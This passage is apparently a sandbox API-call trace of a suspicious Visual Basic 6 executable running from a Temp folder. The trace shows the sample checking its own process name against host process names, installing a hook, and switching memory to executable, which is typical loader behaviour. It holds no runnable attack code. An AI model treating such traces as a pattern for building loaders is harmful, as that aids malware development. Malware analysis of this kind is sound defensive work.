(hModule=0x75580000, lpProcName="VarAdd") returned 0x755a5934 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarAnd") returned 0x755a5a98 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarCat") returned 0x755a59b4 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarDiv") returned 0x755fe405 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarEqv") returned 0x755fef07 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarIdiv") returned 0x755ff00a [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarImp") returned 0x755fef47 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarMod") returned 0x755ff15e [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarMul") returned 0x755fdbd4 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarOr") returned 0x755fecfa [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarPow") returned 0x755fea66 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarSub") returned 0x755fd332 [0057.216] GetProcAddress (hModule=0x75580000, lpProcName="VarXor") returned 0x755fee2e [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarAbs") returned 0x755fca11 [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarFix") returned 0x755fcc5f [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarInt") returned 0x755fcde7 [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarNeg") returned 0x755fc802 [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarNot") returned 0x755fec66 [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarRound") returned 0x755fd155 [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarCmp") returned 0x7559b0dc [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarDecAdd") returned 0x755b5f3e [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarDecCmp") returned 0x755a4fd0 [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarBstrCat") returned 
0x755a0d2c [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarCyMulI4") returned 0x755b59ed [0057.217] GetProcAddress (hModule=0x75580000, lpProcName="VarBstrCmp") returned 0x7558f8b8 [0057.217] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x766f0000 [0057.217] GetProcAddress (hModule=0x766f0000, lpProcName="CoCreateInstanceEx") returned 0x76739d4e [0057.217] GetProcAddress (hModule=0x766f0000, lpProcName="CLSIDFromProgIDEx") returned 0x76700782 [0057.217] GetSystemMetrics (nIndex=42) returned 0 [0057.217] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e688 | out: ppMalloc=0x72a4e688*=0x768366bc) returned 0x0 [0057.217] IMalloc:Alloc (This=0x768366bc, cb=0x4) returned 0x1d4290 [0057.217] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12f968, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe")) returned 0x39 [0057.249] lstrcatA (in: lpString1="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", lpString2=".cfg" | out: lpString1="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe.cfg") returned="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe.cfg" [0057.250] SetLastError (dwErrCode=0x0) [0057.250] SearchPathA (in: lpPath=0x0, lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe.cfg", lpExtension=0x0, nBufferLength=0x103, lpBuffer=0x12f864, lpFilePart=0x12f838 | out: lpBuffer="¤]úvÓ]úv_E\x11w\x88ú\x12", lpFilePart=0x12f838) returned 0x0 [0057.250] SetLastError (dwErrCode=0x2) [0057.250] GetLastError () returned 0x2 [0057.250] lstrcmpiA (lpString1="lambdoidtegument", lpString2="MTX") returned -1 [0057.250] lstrcmpiA (lpString1="lambdoidtegument", lpString2="DLLHOST") returned 1 [0057.250] lstrcmpiA (lpString1="lambdoidtegument", lpString2="INETINFO") returned 1 [0057.250] lstrcmpiA (lpString1="lambdoidtegument", lpString2="W3WP") returned -1 [0057.250] 
lstrcmpiA (lpString1="lambdoidtegument", lpString2="ASPNET_WP") returned 1 [0057.250] lstrcmpiA (lpString1="lambdoidtegument", lpString2="DLLHST3G") returned 1 [0057.250] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12f95c, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe")) returned 0x39 [0057.250] lstrcmpiA (lpString1="lambdoidtegument", lpString2="IEXPLORE") returned 1 [0057.250] LoadLibraryA (lpLibFileName="SXS.DLL") returned 0x75000000 [0057.251] GetLastError () returned 0x0 [0057.251] GetProcAddress (hModule=0x75000000, lpProcName="SxsOleAut32MapIIDOrCLSIDToTypeLibrary") returned 0x75047685 [0057.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x12feac, cbMultiByte=-1, lpWideCharStr=0x12fea8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0057.251] CoRegisterMessageFilter (in: lpMessageFilter=0x1b62054, lplpMessageFilter=0x1b6205c | out: lplpMessageFilter=0x1b6205c*=0x0) returned 0x0 [0057.251] IUnknown:AddRef (This=0x1b62054) returned 0x2 [0057.252] GetClassInfoExA (in: hInstance=0x72940000, lpszClass="ThunderRT6Main", lpwcx=0x12fe78 | out: lpwcx=0x12fe78) returned 0 [0057.252] LoadIconA (hInstance=0x400000, lpIconName=0x1) returned 0x80133 [0057.252] GetModuleHandleA (lpModuleName="USER32") returned 0x76620000 [0057.252] GetProcAddress (hModule=0x76620000, lpProcName="GetSystemMetrics") returned 0x766367cf [0057.252] GetProcAddress (hModule=0x76620000, lpProcName="MonitorFromWindow") returned 0x76633622 [0057.252] GetProcAddress (hModule=0x76620000, lpProcName="MonitorFromRect") returned 0x76630ca1 [0057.252] GetProcAddress (hModule=0x76620000, lpProcName="MonitorFromPoint") returned 0x766294c9 [0057.252] GetProcAddress (hModule=0x76620000, lpProcName="EnumDisplayMonitors") returned 0x766334a3 [0057.252] GetProcAddress (hModule=0x76620000, lpProcName="GetMonitorInfoA") returned 0x7662c34e [0057.252] 
GetSystemMetrics (nIndex=0) returned 1440 [0057.252] GetSystemMetrics (nIndex=78) returned 1440 [0057.252] GetSystemMetrics (nIndex=1) returned 900 [0057.252] GetSystemMetrics (nIndex=79) returned 900 [0057.252] GetSystemMetrics (nIndex=50) returned 16 [0057.252] GetSystemMetrics (nIndex=49) returned 16 [0057.252] LoadImageA (hInst=0x400000, name=0x1, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x90087 [0057.253] RegisterClassExA (param_1=0x12fe78) returned 0x70c1cf [0057.253] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderRT6Main", lpWindowName=0x0, dwStyle=0x80090000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x301fc [0057.253] DefWindowProcA (hWnd=0x301fc, Msg=0x81, wParam=0x0, lParam=0x12fa5c) returned 0x1 [0057.254] DefWindowProcA (hWnd=0x301fc, Msg=0x83, wParam=0x0, lParam=0x12fa98) returned 0x0 [0057.254] DefWindowProcA (hWnd=0x301fc, Msg=0x1, wParam=0x0, lParam=0x12fa5c) returned 0x0 [0057.254] DefWindowProcA (hWnd=0x301fc, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0057.254] DefWindowProcA (hWnd=0x301fc, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0057.254] MonitorFromWindow (hwnd=0x301fc, dwFlags=0x2) returned 0x10001 [0057.254] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x12fe80 | out: lpmi=0x12fe80) returned 1 [0057.254] SetWindowPos (hWnd=0x301fc, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0057.254] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12fe24) returned 0x0 [0057.255] DefWindowProcA (hWnd=0x301fc, Msg=0x47, wParam=0x0, lParam=0x12fe24) returned 0x0 [0057.255] DefWindowProcA (hWnd=0x301fc, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0057.255] ShowWindow (hWnd=0x301fc, nCmdShow=4) returned 0 [0057.255] DefWindowProcA (hWnd=0x301fc, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0057.255] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12fe38) returned 0x0 [0057.256] DefWindowProcA 
(hWnd=0x301fc, Msg=0x47, wParam=0x0, lParam=0x12fe38) returned 0x0 [0057.256] GetWindowThreadProcessId (in: hWnd=0x301fc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb88 [0057.256] VirtualQuery (in: lpAddress=0x12fea8, lpBuffer=0x12fe8c, dwLength=0x1c | out: lpBuffer=0x12fe8c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.256] GetUserDefaultLCID () returned 0x409 [0057.256] IsValidCodePage (CodePage=0x3a4) returned 1 [0057.258] IsValidCodePage (CodePage=0x3b5) returned 1 [0057.258] IsValidCodePage (CodePage=0x3b6) returned 1 [0057.258] IsValidCodePage (CodePage=0x3a8) returned 1 [0057.260] GetUserDefaultLangID () returned 0x409 [0057.260] GetSystemDefaultLangID () returned 0x1d0409 [0057.261] GetSystemMetrics (nIndex=42) returned 0 [0057.261] IMalloc:Alloc (This=0x768366bc, cb=0xa8) returned 0x1dc280 [0057.261] IMalloc:GetSize (This=0x768366bc, pv=0x1dc280) returned 0xa8 [0057.261] IMalloc:Alloc (This=0x768366bc, cb=0xc) returned 0x1ce368 [0057.261] GetCurrentThreadId () returned 0xb88 [0057.261] IMalloc:Alloc (This=0x768366bc, cb=0x3c) returned 0x1d9090 [0057.261] IMalloc:Alloc (This=0x768366bc, cb=0x1c) returned 0x1d8758 [0057.335] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x12fe74 | out: phkResult=0x12fe74*=0x0) returned 0x2 [0057.335] IMalloc:Alloc (This=0x768366bc, cb=0x1c) returned 0x1d8780 [0057.335] GetCurrentThreadId () returned 0xb88 [0057.336] SetWindowsHookExA (idHook=-1, lpfn=0x729a1e09, hmod=0x0, dwThreadId=0xb88) returned 0xa018f [0057.336] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBMsoStdCompMgr", lpWndClass=0x12fdcc | out: lpWndClass=0x12fdcc) returned 0 [0057.336] RegisterClassA (lpWndClass=0x12fdcc) returned 0x7ac1cd [0057.336] CreateWindowExA (dwExStyle=0x0, lpClassName="VBMsoStdCompMgr", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, 
nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x401e4 [0057.336] DefWindowProcA (hWnd=0x401e4, Msg=0x81, wParam=0x0, lParam=0x12fa04) returned 0x1 [0057.336] DefWindowProcA (hWnd=0x401e4, Msg=0x83, wParam=0x0, lParam=0x12fa44) returned 0x0 [0057.336] DefWindowProcA (hWnd=0x401e4, Msg=0x1, wParam=0x0, lParam=0x12fa04) returned 0x0 [0057.336] DefWindowProcA (hWnd=0x401e4, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0057.337] DefWindowProcA (hWnd=0x401e4, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0057.337] SetWindowLongA (hWnd=0x401e4, nIndex=0, dwNewLong=28713116) returned 0 [0057.337] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0057.337] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0057.337] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0057.337] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0057.337] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0057.337] RegisterClipboardFormatA (lpszFormat="OwnerLink") returned 0xc003 [0057.337] RegisterClipboardFormatA (lpszFormat="FileName") returned 0xc006 [0057.337] CreateCompatibleDC (hdc=0x0) returned 0x2301092d [0057.337] GetCurrentObject (hdc=0x2301092d, type=0x7) returned 0x185000f [0057.337] CreateWindowExA (dwExStyle=0x0, lpClassName="VBFocusRT6", lpWindowName=0x0, dwStyle=0x40000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x301fc, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x401e6 [0057.337] DefWindowProcA (hWnd=0x401e6, Msg=0x81, wParam=0x0, lParam=0x12fa9c) returned 0x1 [0057.337] DefWindowProcA (hWnd=0x401e6, Msg=0x83, wParam=0x0, lParam=0x12fad4) returned 0x0 [0057.337] DefWindowProcA (hWnd=0x401e6, Msg=0x1, wParam=0x0, lParam=0x12fa9c) returned 0x0 [0057.337] DefWindowProcA (hWnd=0x401e6, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0057.337] DefWindowProcA (hWnd=0x401e6, Msg=0x3, 
wParam=0x0, lParam=0x0) returned 0x0 [0057.337] DefWindowProcA (hWnd=0x301fc, Msg=0x210, wParam=0x1, lParam=0x401e6) returned 0x0 [0057.338] GetCurrentThreadId () returned 0xb88 [0057.338] GetCurrentThreadId () returned 0xb88 [0057.338] lstrlenA (lpString="VB") returned 2 [0057.338] lstrlenA (lpString="OptionButton") returned 12 [0057.339] lstrlenA (lpString="VB") returned 2 [0057.339] lstrlenA (lpString="Printer") returned 7 [0057.339] lstrlenA (lpString="VB") returned 2 [0057.339] lstrlenA (lpString="Form") returned 4 [0057.339] lstrlenA (lpString="VB") returned 2 [0057.339] lstrlenA (lpString="Screen") returned 6 [0057.339] lstrlenA (lpString="VB") returned 2 [0057.339] lstrlenA (lpString="Clipboard") returned 9 [0057.340] lstrlenA (lpString="VB") returned 2 [0057.340] lstrlenA (lpString="MDIForm") returned 7 [0057.340] lstrlenA (lpString="VB") returned 2 [0057.340] lstrlenA (lpString="App") returned 3 [0057.340] lstrlenA (lpString="VB") returned 2 [0057.340] lstrlenA (lpString="Image") returned 5 [0057.341] lstrlenA (lpString="VB") returned 2 [0057.341] lstrlenA (lpString="UserControl") returned 11 [0057.342] lstrlenA (lpString="VB") returned 2 [0057.342] lstrlenA (lpString="PropertyPage") returned 12 [0057.342] lstrcmpiA (lpString1="VB.MDIForm", lpString2="VB.PropertyPage") returned -1 [0057.342] lstrlenA (lpString="VB") returned 2 [0057.342] lstrlenA (lpString="UserDocument") returned 12 [0057.343] GetCurrentThreadId () returned 0xb88 [0057.343] GetCurrentThreadId () returned 0xb88 [0057.344] GetCurrentThreadId () returned 0xb88 [0057.344] GetCurrentThreadId () returned 0xb88 [0057.344] lstrlenA (lpString="VB") returned 2 [0057.344] lstrlenA (lpString="PictureBox") returned 10 [0057.344] lstrlenA (lpString="VB") returned 2 [0057.344] lstrlenA (lpString="Label") returned 5 [0057.345] lstrlenA (lpString="VB") returned 2 [0057.345] lstrlenA (lpString="TextBox") returned 7 [0057.345] lstrlenA (lpString="VB") returned 2 [0057.345] lstrlenA (lpString="Frame") 
returned 5 [0057.346] lstrlenA (lpString="VB") returned 2 [0057.346] lstrlenA (lpString="CommandButton") returned 13 [0057.346] lstrlenA (lpString="VB") returned 2 [0057.346] lstrlenA (lpString="CheckBox") returned 8 [0057.347] lstrlenA (lpString="VB") returned 2 [0057.347] lstrlenA (lpString="ComboBox") returned 8 [0057.347] lstrlenA (lpString="VB") returned 2 [0057.347] lstrlenA (lpString="ListBox") returned 7 [0057.347] lstrlenA (lpString="VB") returned 2 [0057.347] lstrlenA (lpString="HScrollBar") returned 10 [0057.347] lstrlenA (lpString="VB") returned 2 [0057.347] lstrlenA (lpString="VScrollBar") returned 10 [0057.348] lstrlenA (lpString="VB") returned 2 [0057.348] lstrlenA (lpString="Timer") returned 5 [0057.348] lstrlenA (lpString="VB") returned 2 [0057.348] lstrlenA (lpString="DriveListBox") returned 12 [0057.348] lstrlenA (lpString="VB") returned 2 [0057.348] lstrlenA (lpString="DirListBox") returned 10 [0057.348] lstrlenA (lpString="VB") returned 2 [0057.348] lstrlenA (lpString="FileListBox") returned 11 [0057.349] lstrlenA (lpString="VB") returned 2 [0057.349] lstrlenA (lpString="Menu") returned 4 [0057.349] lstrlenA (lpString="VB") returned 2 [0057.349] lstrlenA (lpString="Shape") returned 5 [0057.349] lstrlenA (lpString="VB") returned 2 [0057.349] lstrlenA (lpString="Line") returned 4 [0057.350] lstrlenA (lpString="VB") returned 2 [0057.350] lstrlenA (lpString="Data") returned 4 [0057.350] lstrlenA (lpString="VB") returned 2 [0057.350] lstrlenA (lpString="OLE") returned 3 [0057.351] IMalloc:Alloc (This=0x768366bc, cb=0x64) returned 0x1dc330 [0057.351] IMalloc:Alloc (This=0x768366bc, cb=0x64) returned 0x1dc3a0 [0057.351] IMalloc:Alloc (This=0x768366bc, cb=0xc) returned 0x1ce380 [0057.351] IMalloc:Alloc (This=0x768366bc, cb=0x40) returned 0x1dc428 [0057.351] IMalloc:GetSize (This=0x768366bc, pv=0x1dc428) returned 0x40 [0057.351] IMalloc:Alloc (This=0x768366bc, cb=0x20) returned 0x1d8910 [0057.351] GetCurrentThreadId () returned 0xb88 [0057.351] 
GetCurrentThreadId () returned 0xb88 [0057.351] IMalloc:Alloc (This=0x768366bc, cb=0x1c) returned 0x1d8938 [0057.351] VirtualProtect (in: lpAddress=0x390000, dwSize=0x6000, flNewProtect=0x4, lpflOldProtect=0x12fdf8 | out: lpflOldProtect=0x12fdf8*=0x20) returned 1 [0057.351] GetCurrentProcess () returned 0xffffffff [0057.351] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x390000, dwSize=0x6000) returned 1 [0057.351] VirtualAlloc (lpAddress=0x390000, dwSize=0x7000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.352] VirtualAlloc (lpAddress=0x390000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.352] VirtualAlloc (lpAddress=0x390000, dwSize=0x9000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.352] VirtualAlloc (lpAddress=0x390000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.352] VirtualProtect (in: lpAddress=0x390000, dwSize=0xa000, flNewProtect=0x20, lpflOldProtect=0x12fdf8 | out: lpflOldProtect=0x12fdf8*=0x4) returned 1 [0057.352] GetCurrentProcess () returned 0xffffffff [0057.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x390000, dwSize=0xa000) returned 1 [0057.352] GetCurrentThreadId () returned 0xb88 [0057.358] GetCurrentThreadId () returned 0xb88 [0057.358] SetWindowTextA (hWnd=0x301fc, lpString="Antroposofi") returned 1 [0057.358] DefWindowProcA (hWnd=0x301fc, Msg=0xc, wParam=0x0, lParam=0x12fd6c) returned 0x1 [0057.358] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x12fd54 | out: phkResult=0x12fd54*=0x0) returned 0x2 [0057.393] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0057.393] VirtualQuery (in: lpAddress=0x12f780, lpBuffer=0x12f764, dwLength=0x1c | out: lpBuffer=0x12f764*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.394] IMalloc:Alloc (This=0x768366bc, cb=0x40) 
returned 0x1dc470 [0057.394] IMalloc:GetSize (This=0x768366bc, pv=0x1dc470) returned 0x40 [0057.394] GetCurrentThreadId () returned 0xb88 [0057.394] GetCurrentThreadId () returned 0xb88 [0057.394] GetCurrentThreadId () returned 0xb88 [0057.399] GetVersionExA (in: lpVersionInformation=0x12f470*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x10100c9, dwMinorVersion=0x12f3c0, dwBuildNumber=0x9, dwPlatformId=0x12f938, szCSDVersion="íàövÛ©ù\x01þÿÿÿÓ]úvàZúvü") | out: lpVersionInformation=0x12f470*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0057.400] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0057.400] GetCurrentThreadId () returned 0xb88 [0057.400] GetCurrentThreadId () returned 0xb88 [0057.400] GetCurrentThreadId () returned 0xb88 [0057.400] SetWindowTextA (hWnd=0x301fc, lpString="Antroposofi") returned 1 [0057.400] DefWindowProcA (hWnd=0x301fc, Msg=0xc, wParam=0x0, lParam=0x1b733b0) returned 0x1 [0057.402] GetCurrentThreadId () returned 0xb88 [0057.402] GetCurrentThreadId () returned 0xb88 [0057.402] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x98 [0057.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x72992cd8, cbMultiByte=-1, lpWideCharStr=0x12f358, cchWideChar=14 | out: lpWideCharStr="MS Sans Serif") returned 14 [0057.402] OleCreateFontIndirect () returned 0x0 [0057.403] lstrlenA (lpString="Delstaterne") returned 11 [0057.405] OleLoadPictureEx () returned 0x0 [0057.433] lstrlenA (lpString="Delstaterne") returned 11 [0057.433] lstrlenA (lpString="ThunderRT6") returned 10 [0057.433] lstrcpyA (in: lpString1=0x12f36c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0057.433] lstrlenA (lpString="ThunderRT6Form") returned 14 [0057.433] lstrcpynA (in: lpString1=0x12f37a, lpString2="DC", iMaxLength=116 | out: lpString1="DC") returned="DC" [0057.433] lstrlenA 
(lpString="ThunderRT6") returned 10 [0057.433] lstrcpyA (in: lpString1=0x12f300, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0057.433] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Form", lpWndClass=0x12f32c | out: lpWndClass=0x12f32c) returned 0 [0057.433] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0057.433] RegisterClassA (lpWndClass=0x12f32c) returned 0xcac1d0 [0057.433] lstrlenA (lpString="ThunderRT6") returned 10 [0057.433] lstrcpyA (in: lpString1=0x12f300, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0057.433] lstrlenA (lpString="ThunderRT6Form") returned 14 [0057.433] lstrcpynA (in: lpString1=0x12f30e, lpString2="DC", iMaxLength=29 | out: lpString1="DC") returned="DC" [0057.433] RegisterClassA (lpWndClass=0x12f32c) returned 0xc1d1 [0057.433] AdjustWindowRectEx (in: lpRect=0x12f42c, dwStyle=0x2000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x12f42c) returned 1 [0057.434] CreateWindowExA (dwExStyle=0x0, lpClassName=0xc1d1, lpWindowName="Delstaterne", dwStyle=0x2000000, X=32, Y=269, nWidth=333, nHeight=11, hWndParent=0x301fc, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x601a8 [0057.434] DefWindowProcA (hWnd=0x601a8, Msg=0x81, wParam=0x0, lParam=0x12ef64) returned 0x1 [0057.434] SetWindowLongA (hWnd=0x601a8, nIndex=-16, dwNewLong=33554432) returned 113246208 [0057.436] DefWindowProcA (hWnd=0x601a8, Msg=0x7c, wParam=0xfffffff0, lParam=0x12ebd8) returned 0x0 [0057.436] DefWindowProcA (hWnd=0x601a8, Msg=0x7d, wParam=0xfffffff0, lParam=0x12ebd8) returned 0x0 [0057.436] DefWindowProcA (hWnd=0x601a8, Msg=0x83, wParam=0x0, lParam=0x12ef8c) returned 0x0 [0057.436] GetSystemMenu (hWnd=0x601a8, bRevert=0) returned 0x0 [0057.436] SetWindowContextHelpId (param_1=0x601a8, param_2=0xffffffff) returned 1 [0057.436] DefWindowProcA (hWnd=0x601a8, Msg=0x1, wParam=0x0, lParam=0x12ef48) returned 0x0 [0057.436] GetDC (hWnd=0x601a8) returned 0x2a0107b2 [0057.436] 
GetTextMetricsA (in: hdc=0x2a0107b2, lptm=0x12f318 | out: lptm=0x12f318) returned 1 [0057.436] SetBkMode (hdc=0x2a0107b2, mode=1) returned 2 [0057.436] OleTranslateColor () returned 0x0 [0057.436] SetBkColor (hdc=0x2a0107b2, color=0xf0f0f0) returned 0xffffff [0057.436] OleTranslateColor () returned 0x0 [0057.436] SetTextColor (hdc=0x2a0107b2, color=0x0) returned 0x0 [0057.436] OleTranslateColor () returned 0x0 [0057.436] CreatePen (iStyle=0, cWidth=1, color=0x0) returned 0x2430092c [0057.436] SelectObject (hdc=0x2a0107b2, h=0x2430092c) returned 0x1b00017 [0057.436] SelectObject (hdc=0x2a0107b2, h=0x1900011) [0057.437] SelectObject (hdc=0x2a0107b2, h=0x220a080f) returned 0x18a002e [0057.437] GetTextMetricsA (in: hdc=0x2a0107b2, lptm=0x12f10c | out: lptm=0x12f10c) returned 1 [0057.437] GetClientRect (in: hWnd=0x601a8, lpRect=0x12f4ac | out: lpRect=0x12f4ac) returned 1 [0057.437] MapWindowPoints (in: hWndFrom=0x601a8, hWndTo=0x0, lpPoints=0x12f4ac, cPoints=0x2 | out: lpPoints=0x12f4ac) returned 17629216 [0057.437] EqualRect (lprc1=0x12f4ac, lprc2=0x12f48c) returned 1 [0057.437] SetEvent (hEvent=0x98) returned 1 [0057.437] SendMessageA (hWnd=0x601a8, Msg=0x80, wParam=0x1, lParam=0x40183) returned 0x0 [0057.437] DefWindowProcA (hWnd=0x601a8, Msg=0x80, wParam=0x1, lParam=0x40183) returned 0x0 [0057.438] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x12f368 | out: ppstm=0x12f368*=0x1d8b18) returned 0x0 [0057.438] GetSystemMetrics (nIndex=49) returned 16 [0057.438] GetSystemMetrics (nIndex=50) returned 16 [0057.438] IStream:RemoteSeek (in: This=0x1d8b18, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0057.438] ISequentialStream:RemoteRead (in: This=0x1d8b18, pv=0x12f318, cb=0x6, pcbRead=0x0 | out: pv=0x12f318*=0x0, pcbRead=0x0) returned 0x0 [0057.438] ISequentialStream:RemoteRead (in: This=0x1d8b18, pv=0x12f2f0, cb=0x10, pcbRead=0x0 | out: pv=0x12f2f0*=0x18, pcbRead=0x0) returned 0x0 [0057.438] 
ISequentialStream:RemoteRead (in: This=0x1d8b18, pv=0x12f2f0, cb=0x10, pcbRead=0x0 | out: pv=0x12f2f0*=0x18, pcbRead=0x0) returned 0x0 [0057.438] IStream:RemoteSeek (in: This=0x1d8b18, dlibMove=0x26, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0057.438] GlobalLock (hMem=0x1ba000c) returned 0x1e1f50 [0057.438] ISequentialStream:RemoteRead (in: This=0x1d8b18, pv=0x1e1f50, cb=0x28, pcbRead=0x0 | out: pv=0x1e1f50*=0x28, pcbRead=0x0) returned 0x0 [0057.438] ISequentialStream:RemoteRead (in: This=0x1d8b18, pv=0x1e1f78, cb=0x6a0, pcbRead=0x0 | out: pv=0x1e1f78*=0xb, pcbRead=0x0) returned 0x0 [0057.438] GlobalUnlock (hMem=0x1ba000c) returned 0 [0057.438] GlobalLock (hMem=0x1ba000c) returned 0x1e1f50 [0057.438] GlobalSize (hMem=0x1ba000c) returned 0x6c8 [0057.438] GetDC (hWnd=0x0) returned 0x200107f3 [0057.438] CreateCompatibleBitmap (hdc=0x200107f3, cx=32, cy=32) returned 0x13050929 [0057.438] SelectObject (hdc=0x2301092d, h=0x13050929) returned 0x185000f [0057.438] StretchDIBits (hdc=0x2301092d, xDest=0, yDest=0, DestWidth=32, DestHeight=32, xSrc=0, ySrc=0, SrcWidth=24, SrcHeight=24, lpBits=0x1e2378, lpbmi=0x1e1f50, iUsage=0x0, rop=0xcc0020) returned 24 [0057.439] GetObjectA (in: h=0x13050929, c=24, pv=0x12f288 | out: pv=0x12f288) returned 24 [0057.439] GlobalLock (hMem=0x1ba001c) returned 0x1deec0 [0057.439] GetBitmapBits (in: hbit=0x13050929, cb=4096, lpvBits=0x1deec0 | out: lpvBits=0x1deec0) returned 4096 [0057.439] SelectObject (hdc=0x2301092d, h=0x185000f) returned 0x13050929 [0057.439] DeleteObject (ho=0x13050929) returned 1 [0057.439] CreateBitmap (nWidth=32, nHeight=32, nPlanes=0x1, nBitCount=0x1, lpBits=0x0) returned 0x14050929 [0057.439] SelectObject (hdc=0x2301092d, h=0x14050929) returned 0x185000f [0057.439] StretchDIBits (hdc=0x2301092d, xDest=0, yDest=0, DestWidth=32, DestHeight=32, xSrc=0, ySrc=0, SrcWidth=24, SrcHeight=24, lpBits=0x1e25b8, lpbmi=0x1e1f50, iUsage=0x0, rop=0xcc0020) returned 24 [0057.439] GetObjectA (in: 
